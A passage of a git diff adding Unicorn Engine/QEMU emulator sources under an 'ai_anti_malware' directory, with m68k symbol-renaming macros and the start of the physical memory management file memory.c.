stq_le_phys_m68k +#define stq_phys stq_phys_m68k +#define string_input_get_visitor string_input_get_visitor_m68k +#define string_input_visitor_cleanup string_input_visitor_cleanup_m68k +#define string_input_visitor_new string_input_visitor_new_m68k +#define strongarm_cp_reginfo strongarm_cp_reginfo_m68k +#define strstart strstart_m68k +#define strtosz strtosz_m68k +#define strtosz_suffix strtosz_suffix_m68k +#define stw_be_p stw_be_p_m68k +#define stw_be_phys stw_be_phys_m68k +#define stw_he_p stw_he_p_m68k +#define stw_le_p stw_le_p_m68k +#define stw_le_phys stw_le_phys_m68k +#define stw_phys stw_phys_m68k +#define stw_phys_internal stw_phys_internal_m68k +#define sub128 sub128_m68k +#define sub16_sat sub16_sat_m68k +#define sub16_usat sub16_usat_m68k +#define sub192 sub192_m68k +#define sub8_sat sub8_sat_m68k +#define sub8_usat sub8_usat_m68k +#define subFloat128Sigs subFloat128Sigs_m68k +#define subFloat32Sigs subFloat32Sigs_m68k +#define subFloat64Sigs subFloat64Sigs_m68k +#define subFloatx80Sigs subFloatx80Sigs_m68k +#define subpage_accepts subpage_accepts_m68k +#define subpage_init subpage_init_m68k +#define subpage_ops subpage_ops_m68k +#define subpage_read subpage_read_m68k +#define subpage_register subpage_register_m68k +#define subpage_write subpage_write_m68k +#define suffix_mul suffix_mul_m68k +#define swap_commutative swap_commutative_m68k +#define swap_commutative2 swap_commutative2_m68k +#define switch_mode switch_mode_m68k +#define switch_v7m_sp switch_v7m_sp_m68k +#define syn_aa32_bkpt syn_aa32_bkpt_m68k +#define syn_aa32_hvc syn_aa32_hvc_m68k +#define syn_aa32_smc syn_aa32_smc_m68k +#define syn_aa32_svc syn_aa32_svc_m68k +#define syn_breakpoint syn_breakpoint_m68k +#define sync_globals sync_globals_m68k +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_m68k +#define syn_cp14_rt_trap syn_cp14_rt_trap_m68k +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_m68k +#define syn_cp15_rt_trap syn_cp15_rt_trap_m68k +#define syn_data_abort syn_data_abort_m68k +#define syn_fp_access_trap syn_fp_access_trap_m68k +#define syn_insn_abort syn_insn_abort_m68k +#define syn_swstep syn_swstep_m68k +#define syn_uncategorized syn_uncategorized_m68k +#define syn_watchpoint syn_watchpoint_m68k +#define syscall_err syscall_err_m68k +#define system_bus_class_init system_bus_class_init_m68k +#define system_bus_info system_bus_info_m68k +#define t2ee_cp_reginfo t2ee_cp_reginfo_m68k +#define table_logic_cc table_logic_cc_m68k +#define target_parse_constraint target_parse_constraint_m68k +#define target_words_bigendian target_words_bigendian_m68k +#define tb_add_jump tb_add_jump_m68k +#define tb_alloc tb_alloc_m68k +#define tb_alloc_page tb_alloc_page_m68k +#define tb_check_watchpoint tb_check_watchpoint_m68k +#define tb_find_fast tb_find_fast_m68k +#define tb_find_pc tb_find_pc_m68k +#define tb_find_slow tb_find_slow_m68k +#define tb_flush tb_flush_m68k +#define tb_flush_jmp_cache tb_flush_jmp_cache_m68k +#define tb_free tb_free_m68k +#define tb_gen_code tb_gen_code_m68k +#define tb_hash_remove tb_hash_remove_m68k +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_m68k +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_m68k +#define tb_invalidate_phys_range tb_invalidate_phys_range_m68k +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_m68k +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_m68k +#define tb_jmp_remove tb_jmp_remove_m68k +#define tb_link_page tb_link_page_m68k +#define tb_page_remove tb_page_remove_m68k +#define tb_phys_hash_func tb_phys_hash_func_m68k +#define tb_phys_invalidate tb_phys_invalidate_m68k +#define tb_reset_jump tb_reset_jump_m68k +#define tb_set_jmp_target tb_set_jmp_target_m68k +#define tcg_accel_class_init tcg_accel_class_init_m68k +#define tcg_accel_type tcg_accel_type_m68k +#define tcg_add_param_i32 tcg_add_param_i32_m68k +#define tcg_add_param_i64 tcg_add_param_i64_m68k +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_m68k +#define tcg_allowed tcg_allowed_m68k +#define tcg_canonicalize_memop tcg_canonicalize_memop_m68k +#define tcg_commit tcg_commit_m68k +#define tcg_cond_to_jcc tcg_cond_to_jcc_m68k +#define tcg_constant_folding tcg_constant_folding_m68k +#define tcg_const_i32 tcg_const_i32_m68k +#define tcg_const_i64 tcg_const_i64_m68k +#define tcg_const_local_i32 tcg_const_local_i32_m68k +#define tcg_const_local_i64 tcg_const_local_i64_m68k +#define tcg_context_init tcg_context_init_m68k +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_m68k +#define tcg_cpu_exec tcg_cpu_exec_m68k +#define tcg_current_code_size tcg_current_code_size_m68k +#define tcg_dump_info tcg_dump_info_m68k +#define tcg_dump_ops tcg_dump_ops_m68k +#define tcg_exec_all tcg_exec_all_m68k +#define tcg_find_helper tcg_find_helper_m68k +#define tcg_func_start tcg_func_start_m68k +#define tcg_gen_abs_i32 tcg_gen_abs_i32_m68k +#define tcg_gen_add2_i32 tcg_gen_add2_i32_m68k +#define tcg_gen_add_i32 tcg_gen_add_i32_m68k +#define tcg_gen_add_i64 tcg_gen_add_i64_m68k +#define tcg_gen_addi_i32 tcg_gen_addi_i32_m68k +#define tcg_gen_addi_i64 tcg_gen_addi_i64_m68k +#define tcg_gen_andc_i32 tcg_gen_andc_i32_m68k +#define tcg_gen_and_i32 tcg_gen_and_i32_m68k +#define tcg_gen_and_i64 tcg_gen_and_i64_m68k +#define tcg_gen_andi_i32 tcg_gen_andi_i32_m68k +#define tcg_gen_andi_i64 tcg_gen_andi_i64_m68k +#define tcg_gen_br tcg_gen_br_m68k +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_m68k +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_m68k +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_m68k +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_m68k +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_m68k +#define tcg_gen_callN tcg_gen_callN_m68k +#define tcg_gen_code tcg_gen_code_m68k +#define tcg_gen_code_common tcg_gen_code_common_m68k +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_m68k +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_m68k +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_m68k +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_m68k +#define tcg_gen_exit_tb tcg_gen_exit_tb_m68k +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_m68k +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_m68k +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_m68k +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_m68k +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_m68k +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_m68k +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_m68k +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_m68k +#define tcg_gen_goto_tb tcg_gen_goto_tb_m68k +#define tcg_gen_ld_i32 tcg_gen_ld_i32_m68k +#define tcg_gen_ld_i64 tcg_gen_ld_i64_m68k +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_m68k +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_m68k +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_m68k +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_m68k +#define tcg_gen_mov_i32 tcg_gen_mov_i32_m68k +#define tcg_gen_mov_i64 tcg_gen_mov_i64_m68k +#define tcg_gen_movi_i32 tcg_gen_movi_i32_m68k +#define tcg_gen_movi_i64 tcg_gen_movi_i64_m68k +#define tcg_gen_mul_i32 tcg_gen_mul_i32_m68k +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_m68k +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_m68k +#define tcg_gen_neg_i32 tcg_gen_neg_i32_m68k +#define tcg_gen_neg_i64 tcg_gen_neg_i64_m68k +#define tcg_gen_not_i32 tcg_gen_not_i32_m68k +#define tcg_gen_op0 tcg_gen_op0_m68k +#define tcg_gen_op1i tcg_gen_op1i_m68k +#define tcg_gen_op2_i32 tcg_gen_op2_i32_m68k +#define tcg_gen_op2_i64 tcg_gen_op2_i64_m68k +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_m68k +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_m68k +#define tcg_gen_op3_i32 tcg_gen_op3_i32_m68k +#define tcg_gen_op3_i64 tcg_gen_op3_i64_m68k +#define tcg_gen_op4_i32 tcg_gen_op4_i32_m68k +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_m68k +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_m68k +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_m68k +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_m68k +#define tcg_gen_op6_i32 tcg_gen_op6_i32_m68k +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_m68k +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_m68k +#define tcg_gen_orc_i32 tcg_gen_orc_i32_m68k +#define tcg_gen_or_i32 tcg_gen_or_i32_m68k +#define tcg_gen_or_i64 tcg_gen_or_i64_m68k +#define tcg_gen_ori_i32 tcg_gen_ori_i32_m68k +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_m68k +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_m68k +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_m68k +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_m68k +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_m68k +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_m68k +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_m68k +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_m68k +#define tcg_gen_sar_i32 tcg_gen_sar_i32_m68k +#define tcg_gen_sari_i32 tcg_gen_sari_i32_m68k +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_m68k +#define tcg_gen_shl_i32 tcg_gen_shl_i32_m68k +#define tcg_gen_shl_i64 tcg_gen_shl_i64_m68k +#define tcg_gen_shli_i32 tcg_gen_shli_i32_m68k +#define tcg_gen_shli_i64 tcg_gen_shli_i64_m68k +#define tcg_gen_shr_i32 tcg_gen_shr_i32_m68k +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_m68k +#define tcg_gen_shr_i64 tcg_gen_shr_i64_m68k +#define tcg_gen_shri_i32 tcg_gen_shri_i32_m68k +#define tcg_gen_shri_i64 tcg_gen_shri_i64_m68k +#define tcg_gen_st_i32 tcg_gen_st_i32_m68k +#define tcg_gen_st_i64 tcg_gen_st_i64_m68k +#define tcg_gen_sub_i32 tcg_gen_sub_i32_m68k +#define tcg_gen_sub_i64 tcg_gen_sub_i64_m68k +#define tcg_gen_subi_i32 tcg_gen_subi_i32_m68k +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_m68k +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_m68k +#define tcg_gen_xor_i32 tcg_gen_xor_i32_m68k +#define tcg_gen_xor_i64 tcg_gen_xor_i64_m68k +#define tcg_gen_xori_i32 tcg_gen_xori_i32_m68k +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_m68k +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_m68k +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_m68k +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_m68k +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_m68k +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_m68k +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_m68k +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_m68k +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_m68k +#define tcg_handle_interrupt tcg_handle_interrupt_m68k +#define tcg_init tcg_init_m68k +#define tcg_invert_cond tcg_invert_cond_m68k +#define tcg_la_bb_end tcg_la_bb_end_m68k +#define tcg_la_br_end tcg_la_br_end_m68k +#define tcg_la_func_end tcg_la_func_end_m68k +#define tcg_liveness_analysis tcg_liveness_analysis_m68k +#define tcg_malloc tcg_malloc_m68k +#define tcg_malloc_internal tcg_malloc_internal_m68k +#define tcg_op_defs_org tcg_op_defs_org_m68k +#define tcg_opt_gen_mov tcg_opt_gen_mov_m68k +#define tcg_opt_gen_movi tcg_opt_gen_movi_m68k +#define tcg_optimize tcg_optimize_m68k +#define tcg_out16 tcg_out16_m68k +#define tcg_out32 tcg_out32_m68k +#define tcg_out64 tcg_out64_m68k +#define tcg_out8 tcg_out8_m68k +#define tcg_out_addi tcg_out_addi_m68k +#define tcg_out_branch tcg_out_branch_m68k +#define tcg_out_brcond32 tcg_out_brcond32_m68k +#define tcg_out_brcond64 tcg_out_brcond64_m68k +#define tcg_out_bswap32 tcg_out_bswap32_m68k +#define tcg_out_bswap64 tcg_out_bswap64_m68k +#define tcg_out_call tcg_out_call_m68k +#define tcg_out_cmp tcg_out_cmp_m68k +#define tcg_out_ext16s tcg_out_ext16s_m68k +#define tcg_out_ext16u tcg_out_ext16u_m68k +#define tcg_out_ext32s tcg_out_ext32s_m68k +#define tcg_out_ext32u tcg_out_ext32u_m68k +#define tcg_out_ext8s tcg_out_ext8s_m68k +#define tcg_out_ext8u tcg_out_ext8u_m68k +#define tcg_out_jmp tcg_out_jmp_m68k +#define tcg_out_jxx tcg_out_jxx_m68k +#define tcg_out_label tcg_out_label_m68k +#define tcg_out_ld tcg_out_ld_m68k +#define tcg_out_modrm tcg_out_modrm_m68k +#define tcg_out_modrm_offset tcg_out_modrm_offset_m68k +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_m68k +#define tcg_out_mov tcg_out_mov_m68k +#define tcg_out_movcond32 tcg_out_movcond32_m68k +#define tcg_out_movcond64 tcg_out_movcond64_m68k +#define tcg_out_movi tcg_out_movi_m68k +#define tcg_out_op tcg_out_op_m68k +#define tcg_out_pop tcg_out_pop_m68k +#define tcg_out_push tcg_out_push_m68k +#define tcg_out_qemu_ld tcg_out_qemu_ld_m68k +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_m68k +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_m68k +#define tcg_out_qemu_st tcg_out_qemu_st_m68k +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_m68k +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_m68k +#define tcg_out_reloc tcg_out_reloc_m68k +#define tcg_out_rolw_8 tcg_out_rolw_8_m68k +#define tcg_out_setcond32 tcg_out_setcond32_m68k +#define tcg_out_setcond64 tcg_out_setcond64_m68k +#define tcg_out_shifti tcg_out_shifti_m68k +#define tcg_out_st tcg_out_st_m68k +#define tcg_out_tb_finalize tcg_out_tb_finalize_m68k +#define tcg_out_tb_init tcg_out_tb_init_m68k +#define tcg_out_tlb_load tcg_out_tlb_load_m68k +#define tcg_out_vex_modrm tcg_out_vex_modrm_m68k +#define tcg_patch32 tcg_patch32_m68k +#define tcg_patch8 tcg_patch8_m68k +#define tcg_pcrel_diff tcg_pcrel_diff_m68k +#define tcg_pool_reset tcg_pool_reset_m68k +#define tcg_prologue_init tcg_prologue_init_m68k +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_m68k +#define tcg_reg_alloc tcg_reg_alloc_m68k +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_m68k +#define tcg_reg_alloc_call tcg_reg_alloc_call_m68k +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_m68k +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_m68k +#define tcg_reg_alloc_op tcg_reg_alloc_op_m68k +#define tcg_reg_alloc_start tcg_reg_alloc_start_m68k +#define tcg_reg_free tcg_reg_free_m68k +#define tcg_reg_sync tcg_reg_sync_m68k +#define tcg_set_frame tcg_set_frame_m68k +#define tcg_set_nop tcg_set_nop_m68k +#define tcg_swap_cond tcg_swap_cond_m68k +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_m68k +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_m68k +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_m68k +#define tcg_target_const_match tcg_target_const_match_m68k +#define tcg_target_init tcg_target_init_m68k +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_m68k +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_m68k +#define tcg_temp_alloc tcg_temp_alloc_m68k +#define tcg_temp_free_i32 tcg_temp_free_i32_m68k +#define tcg_temp_free_i64 tcg_temp_free_i64_m68k +#define tcg_temp_free_internal tcg_temp_free_internal_m68k +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_m68k +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_m68k +#define tcg_temp_new_i32 tcg_temp_new_i32_m68k +#define tcg_temp_new_i64 tcg_temp_new_i64_m68k +#define tcg_temp_new_internal tcg_temp_new_internal_m68k +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_m68k +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_m68k +#define tdb_hash tdb_hash_m68k +#define teecr_write teecr_write_m68k +#define teehbr_access teehbr_access_m68k +#define temp_allocate_frame temp_allocate_frame_m68k +#define temp_dead temp_dead_m68k +#define temps_are_copies temps_are_copies_m68k +#define temp_save temp_save_m68k +#define temp_sync temp_sync_m68k +#define tgen_arithi tgen_arithi_m68k +#define tgen_arithr tgen_arithr_m68k +#define thumb2_logic_op thumb2_logic_op_m68k +#define ti925t_initfn ti925t_initfn_m68k +#define tlb_add_large_page tlb_add_large_page_m68k +#define tlb_flush_entry tlb_flush_entry_m68k +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_m68k +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_m68k +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_m68k +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_m68k +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_m68k +#define tlbi_aa64_va_write tlbi_aa64_va_write_m68k +#define tlbiall_is_write tlbiall_is_write_m68k +#define tlbiall_write tlbiall_write_m68k +#define tlbiasid_is_write tlbiasid_is_write_m68k +#define tlbiasid_write tlbiasid_write_m68k +#define tlbimvaa_is_write tlbimvaa_is_write_m68k +#define tlbimvaa_write tlbimvaa_write_m68k +#define tlbimva_is_write tlbimva_is_write_m68k +#define tlbimva_write tlbimva_write_m68k +#define tlb_is_dirty_ram tlb_is_dirty_ram_m68k +#define tlb_protect_code tlb_protect_code_m68k +#define tlb_reset_dirty_range tlb_reset_dirty_range_m68k +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_m68k +#define tlb_set_dirty tlb_set_dirty_m68k +#define tlb_set_dirty1 tlb_set_dirty1_m68k +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_m68k +#define tlb_vaddr_to_host tlb_vaddr_to_host_m68k +#define token_get_type token_get_type_m68k +#define token_get_value token_get_value_m68k +#define token_is_escape token_is_escape_m68k +#define token_is_keyword token_is_keyword_m68k +#define token_is_operator token_is_operator_m68k +#define tokens_append_from_iter tokens_append_from_iter_m68k +#define to_qiv to_qiv_m68k +#define to_qov to_qov_m68k +#define tosa_init tosa_init_m68k +#define tosa_machine_init tosa_machine_init_m68k +#define tswap32 tswap32_m68k +#define tswap64 tswap64_m68k +#define type_class_get_size type_class_get_size_m68k +#define type_get_by_name type_get_by_name_m68k +#define type_get_parent type_get_parent_m68k +#define type_has_parent type_has_parent_m68k +#define type_initialize type_initialize_m68k +#define type_initialize_interface type_initialize_interface_m68k +#define type_is_ancestor type_is_ancestor_m68k +#define type_new type_new_m68k +#define type_object_get_size type_object_get_size_m68k +#define type_register_internal type_register_internal_m68k +#define type_table_add type_table_add_m68k +#define type_table_get type_table_get_m68k +#define type_table_lookup type_table_lookup_m68k +#define uint16_to_float32 uint16_to_float32_m68k +#define uint16_to_float64 uint16_to_float64_m68k +#define uint32_to_float32 uint32_to_float32_m68k +#define uint32_to_float64 uint32_to_float64_m68k +#define uint64_to_float128 uint64_to_float128_m68k +#define uint64_to_float32 uint64_to_float32_m68k +#define uint64_to_float64 uint64_to_float64_m68k +#define unassigned_io_ops unassigned_io_ops_m68k +#define unassigned_io_read unassigned_io_read_m68k +#define unassigned_io_write unassigned_io_write_m68k +#define unassigned_mem_accepts unassigned_mem_accepts_m68k +#define unassigned_mem_ops unassigned_mem_ops_m68k +#define unassigned_mem_read unassigned_mem_read_m68k +#define unassigned_mem_write unassigned_mem_write_m68k +#define update_spsel update_spsel_m68k +#define v6_cp_reginfo v6_cp_reginfo_m68k +#define v6k_cp_reginfo v6k_cp_reginfo_m68k +#define v7_cp_reginfo v7_cp_reginfo_m68k +#define v7mp_cp_reginfo v7mp_cp_reginfo_m68k +#define v7m_pop v7m_pop_m68k +#define v7m_push v7m_push_m68k +#define v8_cp_reginfo v8_cp_reginfo_m68k +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_m68k +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_m68k +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_m68k +#define vapa_cp_reginfo vapa_cp_reginfo_m68k +#define vbar_write vbar_write_m68k +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_m68k +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_m68k +#define vfp_get_fpcr vfp_get_fpcr_m68k +#define vfp_get_fpscr vfp_get_fpscr_m68k +#define vfp_get_fpsr vfp_get_fpsr_m68k +#define vfp_reg_offset vfp_reg_offset_m68k +#define vfp_set_fpcr vfp_set_fpcr_m68k +#define vfp_set_fpscr vfp_set_fpscr_m68k +#define vfp_set_fpsr vfp_set_fpsr_m68k +#define visit_end_implicit_struct visit_end_implicit_struct_m68k +#define visit_end_list visit_end_list_m68k +#define visit_end_struct visit_end_struct_m68k +#define visit_end_union visit_end_union_m68k +#define visit_get_next_type visit_get_next_type_m68k +#define visit_next_list visit_next_list_m68k +#define visit_optional visit_optional_m68k +#define visit_start_implicit_struct visit_start_implicit_struct_m68k +#define visit_start_list visit_start_list_m68k +#define visit_start_struct visit_start_struct_m68k +#define visit_start_union visit_start_union_m68k +#define vmsa_cp_reginfo vmsa_cp_reginfo_m68k +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_m68k +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_m68k +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_m68k +#define vmsa_ttbcr_write vmsa_ttbcr_write_m68k +#define vmsa_ttbr_write vmsa_ttbr_write_m68k +#define write_cpustate_to_list write_cpustate_to_list_m68k +#define write_list_to_cpustate write_list_to_cpustate_m68k +#define write_raw_cp_reg write_raw_cp_reg_m68k +#define X86CPURegister32_lookup X86CPURegister32_lookup_m68k +#define x86_op_defs x86_op_defs_m68k +#define xpsr_read xpsr_read_m68k +#define xpsr_write xpsr_write_m68k +#define xscale_cpar_write xscale_cpar_write_m68k +#define xscale_cp_reginfo xscale_cp_reginfo_m68k +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c b/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c new file mode 100644 index 0000000..50ebefd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c @@ -0,0 +1,1616 @@ +/* + * Physical memory management + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + * Contributions after 2012-01-13 are licensed under the terms of the + * GNU GPL, version 2 or (at your option) any later version. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "exec/memory.h" +#include "exec/address-spaces.h" +#include "exec/ioport.h" +#include "qapi/visitor.h" +#include "qemu/bitops.h" +#include "qom/object.h" +#include + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" +#include "sysemu/sysemu.h" + +//#define DEBUG_UNASSIGNED + + +// Unicorn engine +MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms) +{ + MemoryRegion *ram = g_new(MemoryRegion, 1); + + memory_region_init_ram(uc, ram, NULL, "pc.ram", size, perms, &error_abort); + if (ram->ram_addr == -1) + // out of memory + return NULL; + + memory_region_add_subregion(get_system_memory(uc), begin, ram); + + if (uc->current_cpu) + tlb_flush(uc->current_cpu, 1); + + return ram; +} + +MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr) +{ + MemoryRegion *ram = g_new(MemoryRegion, 1); + + memory_region_init_ram_ptr(uc, ram, NULL, "pc.ram", size, ptr); + ram->perms = perms; + if (ram->ram_addr == -1) + // out of memory + return NULL; + + memory_region_add_subregion(get_system_memory(uc), begin, ram); + + if (uc->current_cpu) + tlb_flush(uc->current_cpu, 1); + + return ram; +} + +static void memory_region_update_container_subregions(MemoryRegion *subregion); + +void memory_unmap(struct uc_struct *uc, MemoryRegion *mr) +{ + int i; + target_ulong addr; + Object *obj; + + // Make sure all pages associated with the MemoryRegion are flushed + // Only need to do this if we are in a running state + if (uc->current_cpu) { + for (addr = mr->addr; addr < mr->end; addr += uc->target_page_size) { + tlb_flush_page(uc->current_cpu, addr); + } + } + memory_region_del_subregion(get_system_memory(uc), mr); + + for (i = 0; i < uc->mapped_block_count; i++) { + if (uc->mapped_blocks[i] == mr) { + uc->mapped_block_count--; + //shift remainder of array down over deleted pointer + memmove(&uc->mapped_blocks[i], &uc->mapped_blocks[i + 1], sizeof(MemoryRegion*) * (uc->mapped_block_count - i)); + mr->destructor(mr); + obj = OBJECT(mr); + obj->ref = 1; + obj->free = g_free; + g_free((char *)mr->name); + mr->name = NULL; + object_property_del_child(mr->uc, qdev_get_machine(mr->uc), obj, &error_abort); + break; + } + } +} + +int memory_free(struct uc_struct *uc) +{ + MemoryRegion *mr; + Object *obj; + int i; + + for (i = 0; i < uc->mapped_block_count; i++) { + mr = uc->mapped_blocks[i]; + mr->enabled = false; + memory_region_del_subregion(get_system_memory(uc), mr); + mr->destructor(mr); + obj = OBJECT(mr); + obj->ref = 1; + obj->free = g_free; + object_property_del_child(mr->uc, qdev_get_machine(mr->uc), obj, &error_abort); + } + + return 0; +} + +static void memory_init(struct uc_struct *uc) +{ +} + +typedef struct AddrRange AddrRange; + +/* + * Note that signed integers are needed for negative offsetting in aliases + * (large MemoryRegion::alias_offset). + */ +struct AddrRange { + Int128 start; + Int128 size; +}; + +static AddrRange addrrange_make(Int128 start, Int128 size) +{ + AddrRange ar; + ar.start = start; + ar.size = size; + return ar; +} + +static bool addrrange_equal(AddrRange r1, AddrRange r2) +{ + return int128_eq(r1.start, r2.start) && int128_eq(r1.size, r2.size); +} + +static Int128 addrrange_end(AddrRange r) +{ + return int128_add(r.start, r.size); +} + +static bool addrrange_contains(AddrRange range, Int128 addr) +{ + return int128_ge(addr, range.start) + && int128_lt(addr, addrrange_end(range)); +} + +static bool addrrange_intersects(AddrRange r1, AddrRange r2) +{ + return addrrange_contains(r1, r2.start) + || addrrange_contains(r2, r1.start); +} + +static AddrRange addrrange_intersection(AddrRange r1, AddrRange r2) +{ + Int128 start = int128_max(r1.start, r2.start); + Int128 end = int128_min(addrrange_end(r1), addrrange_end(r2)); + return addrrange_make(start, int128_sub(end, start)); +} + +enum ListenerDirection { Forward, Reverse }; + +static bool memory_listener_match(MemoryListener *listener, + MemoryRegionSection *section) +{ + return !listener->address_space_filter + || listener->address_space_filter == section->address_space; +} + +#define MEMORY_LISTENER_CALL_GLOBAL(_callback, _direction, ...) \ + do { \ + MemoryListener *_listener; \ + \ + switch (_direction) { \ + case Forward: \ + QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ + if (_listener->_callback) { \ + _listener->_callback(_listener, ##__VA_ARGS__); \ + } \ + } \ + break; \ + case Reverse: \ + QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, \ + memory_listeners, link) { \ + if (_listener->_callback) { \ + _listener->_callback(_listener, ##__VA_ARGS__); \ + } \ + } \ + break; \ + default: \ + abort(); \ + } \ + } while (0) + +#define MEMORY_LISTENER_CALL(_callback, _direction, _section, ...) \ + do { \ + MemoryListener *_listener; \ + \ + switch (_direction) { \ + case Forward: \ + QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ + if (_listener->_callback \ + && memory_listener_match(_listener, _section)) { \ + _listener->_callback(_listener, _section, ##__VA_ARGS__); \ + } \ + } \ + break; \ + case Reverse: \ + QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, \ + memory_listeners, link) { \ + if (_listener->_callback \ + && memory_listener_match(_listener, _section)) { \ + _listener->_callback(_listener, _section, ##__VA_ARGS__); \ + } \ + } \ + break; \ + default: \ + abort(); \ + } \ + } while (0) + +/* No need to ref/unref .mr, the FlatRange keeps it alive. */ +#define MEMORY_LISTENER_UPDATE_REGION(fr, as, dir, callback) \ + do { MemoryRegionSection _mrs = MemoryRegionSection_make((fr)->mr, as, (fr)->offset_in_region, \ + (fr)->addr.size, int128_get64((fr)->addr.start), (fr)->readonly); \ + MEMORY_LISTENER_CALL(callback, dir, &_mrs); } while(0); + +/* + MEMORY_LISTENER_CALL(callback, dir, (&(MemoryRegionSection) { \ + .mr = (fr)->mr, \ + .address_space = (as), \ + 